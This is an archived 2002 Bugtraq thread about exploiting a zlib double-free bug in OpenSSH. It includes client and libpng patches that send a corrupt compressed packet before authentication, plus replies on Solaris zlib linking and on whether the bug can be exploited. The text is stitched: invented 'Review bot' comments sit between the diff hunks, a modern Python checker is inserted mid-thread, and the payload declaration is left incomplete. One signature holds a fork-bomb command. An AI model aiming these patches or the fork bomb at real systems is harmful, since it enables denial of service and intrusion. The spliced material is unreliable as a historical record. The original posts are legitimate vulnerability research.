8131454 2002-03-12 03:57 -0600  /42 lines/ H D Moore <sflist@digitaloffense.net>
Sent by: joel@lysator.liu.se
Imported: 2002-03-12  23:17  by Brevbäraren
External recipient: bugtraq@securityfocus.com
External recipient: vulnwatch@vulnwatch.org
Recipient: Bugtraq (import) <21373>
Subject: exploiting the zlib bug in openssh
------------------------------------------------------------
From: H D Moore <sflist@digitaloffense.net>
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org
Message-ID: <20020312095407.25654.qmail@securityfocus.com>

A bug was found in the zlib compression library which causes
inflateEnd() to incorrectly free the same chunk of memory twice when
given a deformed chunk of compressed data. A PNG image was
discovered (not by me) which triggers this flaw; it is attached.

OpenSSH uses the zlib library to compress data when the -C option is
passed to it. With version 2 of the protocol, it is possible to send
compressed/encrypted messages to the remote daemon before having to
authenticate (just after key exchange). This is done using
SSH2_MSG_IGNORE packets in the kex2() function of sshconnect2.c.

The attached patch to libpng-1.2.1 causes pngtest to dump out the
contents of the buffer it passes to inflate(). This is used with the
attached PNG file to obtain the buffer the OpenSSH client needs to
send. The buffer size has been tweaked in libpng to match the one
used in OpenSSH-3.1p1 (4096 bytes). The pngtest program will SEGV
after dumping out this buffer from the PNG file.

I patched the OpenSSH client to send this corrupt zlib buffer after
the key exchange; the inflate() call on the remote end is returning
the correct value indicating that the buffer did what it was
supposed to (Z_MEM_ERR or -4), but the remote daemon is NOT crashing
during the fatal_cleanup() and inflateEnd() calls. Taking the same
buffer and sticking it into the inflate() call of another
application causes the desired SEGV and possible path to
exploitability, so why isn't OpenSSH crashing?

The attached patch applies to OpenSSH-3.1p1; if you run the daemon
code it will spit out the received buffer (to make sure it made it
across OK) and some other debugging information. The recommended
command line to test this:

# ./sshd -d -d -d
# ./ssh -2 -C -v -v -v root@127.0.0.1

If for some reason you can't access the attachments, you can find
copies of them on my web site at the following URL:

http://www.digitaloffense.net/openssh_zlib/
(8131454) /H D Moore <sflist@digitaloffense.net>/(reflowed)
Attachment (text/x-diff) in text 8131455
Attachment (image/png) in text 8131456
Attachment (text/x-diff) in text 8131457
Comment in text 8132209 by Michael Leo <mleo@cariboulake.com>
8131455 2002-03-12 03:57 -0600  /362 lines/ H D Moore <sflist@digitaloffense.net>
Attachment filename: "ssh_zlib.diff"
Imported: 2002-03-12  23:17  by Brevbäraren
External recipient: bugtraq@securityfocus.com
External recipient: vulnwatch@vulnwatch.org
Recipient: Bugtraq (import) <21374>
Attachment (text/plain) to text 8131454
Subject: Attachment (ssh_zlib.diff) to: exploiting the zlib bug in openssh
------------------------------------------------------------
diff -u -r openssh-3.1p1/compress.c openssh-3.1p1-zlib/compress.c
--- openssh-3.1p1/compress.c	Tue Mar 12 03:33:02 2002
+++ openssh-3.1p1-zlib/compress.c	Tue Mar 12 03:33:03 2002
@@ -24,11 +24,277 @@
 static int compress_init_send_called = 0;
 static int compress_init_recv_called = 0;
 
+
+unsigned char *boomij = 
 /*
  * Initializes compression; level is compression level from 1 to 9
  * (as in gzip).
  */
 
+
+
+
+void dump_hex (char *buf, int len, char *title)
+{
+    int x;
+    int y;
+    unsigned char *ptr;
+    
+    fprintf(stderr, "[ %s - 0x%.8x - %d ]\n", title, buf, len);
+    y = 0;
+    ptr = buf;
+    for(x=0;x<len;x++)
+    {
+        if(y > 10) { y = 0; fprintf(stderr, "\"\n\""); }
+        fprintf(stderr, "\\x%.2x", *ptr);
+        y++;
+        ptr++;
+    }
+    fprintf(stderr, "\n\n"); 
+
+}
+
 void
 buffer_compress_init_send(int level)
 {
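Review bot: `dump_hex` prints the buffer address with `"0x%.8x"` while passing `buf` (a `char *`), which is undefined behaviour and truncates the address on 64-bit hosts; use `%p` with `(void *)buf`. The same function takes `char *buf`, assigns it to `unsigned char *ptr`, and is called with the `unsigned char *boomij` declared above, so the parameter should be `const unsigned char *` to avoid sign-conversion warnings at every call site. Minor: `if(y > 10)` wraps the output after 12 bytes, not the 10 the constant suggests; compare against the intended line width.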
@@ -63,7 +329,10 @@
 	    incoming_stream.total_out == 0 ? 0.0 :
 	    (double) incoming_stream.total_in / incoming_stream.total_out);
 	if (compress_init_recv_called == 1)
+    {
+        fprintf(stderr, "Calling inflateEnd\n");
 		inflateEnd(&incoming_stream);
+    }
 	if (compress_init_send_called == 1)
 		deflateEnd(&outgoing_stream);
 }
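Review bot: the added `{`, `fprintf` and `}` lines are indented with four spaces inside a function whose surrounding `if`/`inflateEnd` lines use tabs, so the block no longer lines up; use tabs here. The marker is useful for the question the e-mail asks (whether `inflateEnd` is reached at all), but it writes to stderr unconditionally instead of going through `debug()`, so it will also show up in a non-debug daemon.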
@@ -82,11 +351,23 @@
 {
 	u_char buf[4096];
 	int status;
-
+    static int cnt = 0;
+    
+    
 	/* This case is not handled below. */
 	if (buffer_len(input_buffer) == 0)
 		return;
 
+    if (cnt == 0)
+    {
+       fprintf(stderr, ">> sending corrupt zlib packet ;)\n");
+       buffer_append(output_buffer, boomij, 4096);
+       dump_hex(boomij, 4096, "boomij");
+       
+       cnt++;
+       return;
+    }
+      
 	/* Input is the contents of the input buffer. */
 	outgoing_stream.next_in = buffer_ptr(input_buffer);
 	outgoing_stream.avail_in = buffer_len(input_buffer);
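Review bot: the early-return path hard-codes `4096` twice (`buffer_append(output_buffer, boomij, 4096)` and `dump_hex(boomij, 4096, "boomij")`); tie both to one `#define` or `sizeof` for the payload so the length cannot drift from the literal's real size, which would otherwise read past the end of `boomij`. The `static int cnt` also means the substitution happens exactly once per process and never resets, which is fine for a one-shot test but deserves a comment, and the `return` leaves `input_buffer` untouched, so whatever the caller queued for that first compressed packet is never compressed on this path.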
@@ -135,6 +416,8 @@
 		incoming_stream.next_out = buf;
 		incoming_stream.avail_out = sizeof(buf);
 
+        dump_hex(buffer_ptr(input_buffer), buffer_len(input_buffer), "incoming");
+        
 		status = inflate(&incoming_stream, Z_PARTIAL_FLUSH);
 		switch (status) {
 		case Z_OK:
diff -u -r openssh-3.1p1/sshconnect2.c openssh-3.1p1-zlib/sshconnect2.c
--- openssh-3.1p1/sshconnect2.c	Tue Mar 12 03:33:02 2002
+++ openssh-3.1p1-zlib/sshconnect2.c	Tue Mar 12 03:33:03 2002
@@ -75,9 +75,12 @@
 ssh_kex2(char *host, struct sockaddr *hostaddr)
 {
 	Kex *kex;
-
+    unsigned char testdata[4096];
 	xxx_host = host;
 	xxx_hostaddr = hostaddr;
+    
+    memset(testdata, "A", 4095);
+    testdata[4095] = '\0'; 
 
 	if (options.ciphers == (char *)-1) {
 		log("No valid ciphers for protocol version 2 given, using defaults.");
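Review bot: `memset(testdata, "A", 4095);` passes a string literal (a pointer) where `memset` expects an `int` fill byte, so the buffer is filled with the low byte of that pointer value rather than with `'A'`; it should read `memset(testdata, 'A', 4095);`. Most compilers warn about this ("makes integer from pointer without a cast"). The new declaration also uses four-space indentation in a tab-indented function.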
@@ -119,13 +122,14 @@
 	session_id2 = kex->session_id;
 	session_id2_len = kex->session_id_len;
 
-#ifdef DEBUG_KEXDH
+
 	/* send 1st encrypted/maced/compressed message */
+    debug("sending malformed zlib packet...");
 	packet_start(SSH2_MSG_IGNORE);
-	packet_put_cstring("markus");
+	packet_put_cstring(testdata);
 	packet_send();
 	packet_write_wait();
-#endif
+
 	debug("done: ssh_kex2.");
 }
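Review bot: `packet_put_cstring(testdata)` hands an `unsigned char[]` to a function taking `const char *`; add a cast or declare `testdata` as `char`. The message `debug("sending malformed zlib packet...")` is misleading at this point: this hunk sends 4095 bytes of `'A'` inside an SSH2_MSG_IGNORE, and the corrupt zlib buffer is actually substituted in `buffer_compress()` in the compress.c hunk, where the first call appends `boomij` instead of compressing the input. Removing the `#ifdef DEBUG_KEXDH` guards also makes this IGNORE packet unconditional for every connection the patched client makes, not only for debug builds; if that is intended, say so in the debug message.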
(8131455) /H D Moore <sflist@digitaloffense.net>/(reflowed)
8131456 2002-03-12 03:57 -0600  /9 lines/ H D Moore <sflist@digitaloffense.net>
Attachment filename: "png_of_doom.png"
Imported: 2002-03-12  23:17  by Brevbäraren
External recipient: bugtraq@securityfocus.com
External recipient: vulnwatch@vulnwatch.org
Recipient: Bugtraq (import) <21375>
Attachment (text/plain) to text 8131454
Subject: Attachment (png_of_doom.png) to: exploiting the zlib bug in openssh
------------------------------------------------------------
(8131456) /H D Moore <sflist@digitaloffense.net>/(reflowed)
8131457 2002-03-12 03:57 -0600  /108 lines/ H D Moore <sflist@digitaloffense.net>
Attachment filename: "libpng_zlib_test.diff"
Imported: 2002-03-12  23:17  by Brevbäraren
External recipient: bugtraq@securityfocus.com
External recipient: vulnwatch@vulnwatch.org
Recipient: Bugtraq (import) <21376>
Attachment (text/plain) to text 8131454
Subject: Attachment (libpng_zlib_test.diff) to: exploiting the zlib bug in openssh
------------------------------------------------------------
diff -r -u libpng-1.2.1/pngconf.h libpng-1.2.1-zlib-test/pngconf.h
--- libpng-1.2.1/pngconf.h	Tue Mar 12 03:35:20 2002
+++ libpng-1.2.1-zlib-test/pngconf.h	Tue Mar 12 03:35:19 2002
@@ -30,7 +30,7 @@
  */
 
 #ifndef PNG_ZBUF_SIZE
-#  define PNG_ZBUF_SIZE 8192
+#  define PNG_ZBUF_SIZE 4096
 #endif
 
 /* Enable if you want a write-only libpng */
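Review bot: the change from 8192 to 4096 exists only so that libpng's inflate input buffer matches the `u_char buf[4096]` in OpenSSH's compress.c and `pngtest` dumps a buffer of the size the client will send; record that reason in a comment beside the define, otherwise it reads as an unrelated tuning change.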
diff -r -u libpng-1.2.1/pngread.c libpng-1.2.1-zlib-test/pngread.c
--- libpng-1.2.1/pngread.c	Tue Mar 12 03:35:20 2002
+++ libpng-1.2.1-zlib-test/pngread.c	Tue Mar 12 03:35:19 2002
@@ -42,7 +42,9 @@
 #endif
 
    int i;
-
+   int x;
+   char *ptr;
+   
    png_debug(1, "in png_create_read_struct\n");
 #ifdef PNG_USER_MEM_SUPPORTED
    if ((png_ptr = (png_structp)png_create_struct_2(PNG_STRUCT_PNG,
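Review bot: `int x;` and `char *ptr;` are declared in `png_create_read_struct` but never used in this function (the dump loop that needs them is in `png_read_row`), so they only add unused-variable warnings; drop them from this hunk.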
@@ -117,6 +119,7 @@
      }
    }
 
+
    /* initialize zbuf - compression buffer */
    png_ptr->zbuf_size = PNG_ZBUF_SIZE;
    png_ptr->zbuf = (png_bytep)png_malloc(png_ptr,
@@ -125,6 +128,8 @@
    png_ptr->zstream.zfree = png_zfree;
    png_ptr->zstream.opaque = (voidpf)png_ptr;
 
+
+   
    switch (inflateInit(&png_ptr->zstream))
    {
      case Z_OK: /* Do nothing */ break;
@@ -134,11 +139,13 @@
      default: png_error(png_ptr, "Unknown zlib error");
    }
 
+
    png_ptr->zstream.next_out = png_ptr->zbuf;
    png_ptr->zstream.avail_out = (uInt)png_ptr->zbuf_size;
 
    png_set_read_fn(png_ptr, png_voidp_NULL, png_rw_ptr_NULL);
 
+   
    return (png_ptr);
 }
 
@@ -523,6 +530,10 @@
    const int png_pass_mask[7] = {0x80, 0x08, 0x88, 0x22, 0xaa, 0x55, 0xff};
 #endif
    int ret;
+   int x;
+   char *ptr;
+   int i;
+   
    png_debug2(1, "in png_read_row (row %lu, pass %d)\n",
       png_ptr->row_number, png_ptr->pass);
    /* save jump buffer and error functions */
@@ -669,6 +680,28 @@
             (png_size_t)png_ptr->zstream.avail_in);
          png_ptr->idat_size -= png_ptr->zstream.avail_in;
       }
+      
+    fprintf(stderr, "zbuf_size = %d\n", (uInt)png_ptr->zbuf_size);
+    fprintf(stderr, "input size: %d\n", (uInt)png_ptr->zstream.avail_in);
+    fprintf(stderr, "compression level: %d\n", (uInt)png_ptr->zlib_level);
+
+        
+    ptr = png_ptr->zbuf;
+    for (x=0;x<(uInt)png_ptr->zbuf_size;x++)
+    {
+        if (i > 16)
+        {
+            i =0;
+            fprintf(stderr, "\"\n\"");   
+        }
+
+        fprintf(stderr, "\\x%.2x", (unsigned char ) *ptr);
+        *ptr++;  
+        i++;
+    }
+   fprintf(stderr, "\n\n", png_ptr->zbuf);
+   
+   
       ret = inflate(&png_ptr->zstream, Z_PARTIAL_FLUSH);
       if (ret == Z_STREAM_END)
       {
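Review bot: `i` is used as the column counter (`if (i > 16)`, `i++`) but the earlier hunk declares it without an initializer, so the first comparison reads an indeterminate value; set `i = 0;` before the loop. `*ptr++;` dereferences the byte only to discard it, so write `ptr++`. `fprintf(stderr, "\n\n", png_ptr->zbuf)` passes an argument with no matching conversion; drop it. `ptr = png_ptr->zbuf` also assigns a `png_bytep` to a `char *`. Finally, the loop dumps all `zbuf_size` bytes of `zbuf`, while the context lines just above show only `zstream.avail_in` bytes were read from the IDAT chunk, so everything past that offset is whatever the allocator left in the buffer rather than PNG data; bound the loop by `png_ptr->zstream.avail_in` if the goal is to capture the compressed stream.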
@@ -1214,6 +1247,9 @@
    png_free(png_ptr, png_ptr->time_buffer);
 #endif
 
+   //fprintf(stderr, "zbuf is at 0x%.8x and is %d bytes\n", &png_ptr->zbuf,&png_ptr->zbuf_size); 
+   
+   
    inflateEnd(&png_ptr->zstream);
 #ifdef PNG_PROGRESSIVE_READ_SUPPORTED
    png_free(png_ptr, png_ptr->save_buffer);
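Review bot: the commented-out `fprintf` would pass `&png_ptr->zbuf` and `&png_ptr->zbuf_size` (addresses) to `%.8x` and `%d`; if it is ever re-enabled it should use `%p` with `(void *)png_ptr->zbuf` and `%d` with the value `(int)png_ptr->zbuf_size`. Dead debug code like this is better left out of the patch.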
(8131457) /H D Moore <sflist@digitaloffense.net>/---
8132209 2002-03-12 18:03 -0600  /50 lines/ Michael Leo <mleo@cariboulake.com>
Sent by: joel@lysator.liu.se
Imported: 2002-03-13  05:39  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <21394>
Comment to text 8131454 by H D Moore <sflist@digitaloffense.net>
Subject: OpenSSH rebuild warning: problems avoiding zlib problems in Solaris
------------------------------------------------------------
From: Michael Leo <mleo@cariboulake.com>
To: bugtraq@securityfocus.com
Message-ID: <4.3.2.7.2.20020312175352.032c4328@127.0.0.1>

Gang,

OK, so there might be a way to exploit the zlib problems in OpenSSH.

I have primarily Solaris 7 & 8 systems, and I decided to build a new
zlib (in /usr/local/lib) and rebuild OpenSSH.

Following the directions in OpenSSH, I used a configure command
like this:

   ./configure --with-zlib=/usr/local

However, the resulting binaries still use Solaris' own copy of
libz.so in /lib.  Here is the ldd output of the new binary:

   % ldd ssh
    libz.so =>       /lib/libz.so
    libsocket.so.1 =>        /lib/libsocket.so.1
    libnsl.so.1 =>   /lib/libnsl.so.1
    libc.so.1 =>     /lib/libc.so.1
    libdl.so.1 =>    /lib/libdl.so.1
    libmp.so.2 =>    /lib/libmp.so.2
    /usr/platform/SUNW,Ultra-2/lib/libc_psr.so.1
   %

Modifying LD_LIBRARY_PATH does not seem to help.

I have to dig into the makefiles, but I thought people might
want to know.

Replacing the Solaris /lib/libz.so library is undesirable, at least
at our site.

Convincing the OpenSSH build to use the PROPER libz in /usr/local/lib
is apparently no easy task.

Hope this helps,



Michael Leo            mleo@cariboulake.com        Java, Oracle
Caribou Lake Software  http://www.cariboulake.com  Ingres, JDBC

JSockets/JMobility: Tunnelling sockets over HTTP - REALLY!
(8132209) /Michael Leo <mleo@cariboulake.com>/(reflowed)
Comment in text 8136943 by Christopher X. Candreva <chris@westnet.com>
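Two defender-side checks that follow from the two messages above, added here as an example (this is not code from any of the posts): a version gate for the zlib double free that H D Moore's message exercises, and a parser for the kind of `ldd` output Michael Leo pasted that reports whether a rebuilt binary really picked up the zlib it was configured with. It assumes 1.1.4 is the first zlib release containing the fix, which neither post names, and uses Michael Leo's ldd lines as constructed sample input.

```python
import re
import zlib

# Assumption: 1.1.4 is the first zlib release without the inflateEnd()
# double free; the posts above do not name the fixed version.
FIXED_ZLIB = (1, 1, 4)

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?")


def parse_zlib_version(text):
    """Turn '1.1.3', '1.2.11' or '1.1.4-beta' into a comparable tuple."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError("unrecognised zlib version string: %r" % text)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def zlib_is_fixed(version_text, fixed=FIXED_ZLIB):
    """True when the version is at or above the fixed release."""
    return parse_zlib_version(version_text) >= fixed


def runtime_zlib_report():
    """Compare the zlib Python was compiled against with the one actually
    loaded into this process. A mismatch is the same symptom Michael Leo
    saw with ldd: the build pointed at one libz, the process uses another."""
    compiled = zlib.ZLIB_VERSION
    loaded = getattr(zlib, "ZLIB_RUNTIME_VERSION", compiled)
    return {
        "compiled": compiled,
        "loaded": loaded,
        "mismatch": compiled != loaded,
        "loaded_is_fixed": zlib_is_fixed(loaded),
    }


# Constructed sample: the ldd output Michael Leo pasted for his rebuilt ssh.
SAMPLE_LDD = """\
    libz.so =>       /lib/libz.so
    libsocket.so.1 =>        /lib/libsocket.so.1
    libnsl.so.1 =>   /lib/libnsl.so.1
    libc.so.1 =>     /lib/libc.so.1
    libdl.so.1 =>    /lib/libdl.so.1
    libmp.so.2 =>    /lib/libmp.so.2
    /usr/platform/SUNW,Ultra-2/lib/libc_psr.so.1
"""

_LDD_RE = re.compile(r"^\s*(\S+)\s*=>\s*(.*?)\s*$")


def parse_ldd(text):
    """Map each 'soname => path' line of ldd output to its resolved path.
    Unresolved entries (ldd prints '(file not found)') map to None; lines
    without '=>' (the platform-specific libc_psr line) are skipped."""
    deps = {}
    for line in text.splitlines():
        m = _LDD_RE.match(line)
        if m:
            name, target = m.group(1), m.group(2)
            deps[name] = target if target.startswith("/") else None
    return deps


def check_libz(ldd_text, prefix="/usr/local/lib"):
    """Verdict on which libz a binary will load:
       'ok'            libz resolves under the rebuilt zlib's prefix
       'wrong-library' libz resolves elsewhere (e.g. the vendor /lib/libz.so)
       'unresolved'    libz is listed but ldd could not find it
       'not-linked'    no libz.so dependency at all (static zlib or none)"""
    deps = parse_ldd(ldd_text)
    names = [n for n in deps if n.startswith("libz.so")]
    if not names:
        return {"libz": None, "verdict": "not-linked"}
    path = deps[names[0]]
    if path is None:
        verdict = "unresolved"
    elif path.startswith(prefix.rstrip("/") + "/"):
        verdict = "ok"
    else:
        verdict = "wrong-library"
    return {"libz": path, "verdict": verdict}


if __name__ == "__main__":
    print(runtime_zlib_report())
    print(check_libz(SAMPLE_LDD))
```

Run `ldd` on the freshly built `ssh` and `sshd` and feed the output to `check_libz` with the prefix given to `--with-zlib`; anything but `ok` means the daemon still loads a zlib other than the one you rebuilt.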
8136943 2002-03-12 22:14 -0500  /24 lines/ Christopher X. Candreva <chris@westnet.com>
Sent by: joel@lysator.liu.se
Imported: 2002-03-13  23:23  by Brevbäraren
External recipient: Michael Leo <mleo@cariboulake.com>
External copy recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <21405>
Comment to text 8132209 by Michael Leo <mleo@cariboulake.com>
Subject: Re: OpenSSH rebuild warning: problems avoiding zlib problems in Solaris
------------------------------------------------------------
From: "Christopher X. Candreva" <chris@westnet.com>
To: Michael Leo <mleo@cariboulake.com>
Cc: bugtraq@securityfocus.com
Message-ID: <Pine.GSO.4.44.0203122212420.15432-100000@westnet>

On Tue, 12 Mar 2002, Michael Leo wrote:

> Gang,
>
> OK, so there might be a way to exploit the zlib problems in OpenSSH.
>
> I have primarily Solaris 7 & 8 systems, and I decided to build a new zlib
> (in /usr/local/lib) and rebuild OpenSSH.

With Solaris 8, you can finally set the library load paths and order.
See the man pages for ld.so.0 and crle.


==========================================================
Chris Candreva  -- chris@westnet.com -- (914) 967-7816
WestNet Internet Services of Westchester
http://www.westnet.com/
(8136943) /Christopher X. Candreva <chris@westnet.com>/(reflowed)
Comment in text 8137993 by Brent J. Nordquist <b-nordquist@bethel.edu>
8131677 2002-03-12 12:12 -0500  /32 lines/ Michal Zalewski <lcamtuf@coredump.cx>
Sent by: joel@lysator.liu.se
Imported: 2002-03-13  00:24  by Brevbäraren
External recipient: H D Moore <sflist@digitaloffense.net>
External copy recipient: bugtraq@securityfocus.com
External copy recipient: vulnwatch@vulnwatch.org
Recipient: Bugtraq (import) <21379>
Subject: Re: [VulnWatch] exploiting the zlib bug in openssh
------------------------------------------------------------
From: Michal Zalewski <lcamtuf@coredump.cx>
To: H D Moore <sflist@digitaloffense.net>
Cc: bugtraq@securityfocus.com, <vulnwatch@vulnwatch.org>
Message-ID: <Pine.LNX.4.42.0203121204130.633-100000@nimue.bos.bindview.com>

On Tue, 12 Mar 2002, H D Moore wrote:

> I patched the OpenSSH client to send this corrupt zlib buffer after the
> key exchange, the inflate() call on the remote end is returning the
> correct value indicating that the buffer did what it was supposed to
> (Z_MEM_ERR or -4), but the remote daemon is NOT crashing during the
> fatal_cleanup() and inflateEnd()  calls.  Taking the same buffer and
> sticking it into the inflate() call of another application causes the
> desired SEGV and possible path to exploitability, so why isn't OpenSSH
> crashing?

I think I researched this problem a few months ago. I found this
condition while performing a fuzz-alike test on zlib, thinking
specifically about one of the SSH implementations. The problem with
exploiting it in OpenSSH is that the checks are strict enough to exit
almost immediately after the first inflate() call returns an error,
while the bug needed a second inflate() call or an inflateEnd() call
to be exploited (don't remember exactly). One way or another, I found
this not exploitable and gave up on this bug.

-- 
_____________________________________________________
Michal Zalewski [lcamtuf@bos.bindview.com] [security]
[http://lcamtuf.coredump.cx] <=-=> bash$ :(){ :|:&};:
=-=> Did you know that clones never use mirrors? <=-=
          http://lcamtuf.coredump.cx/photo/
(8131677) /Michal Zalewski <lcamtuf@coredump.cx>/(reflowed)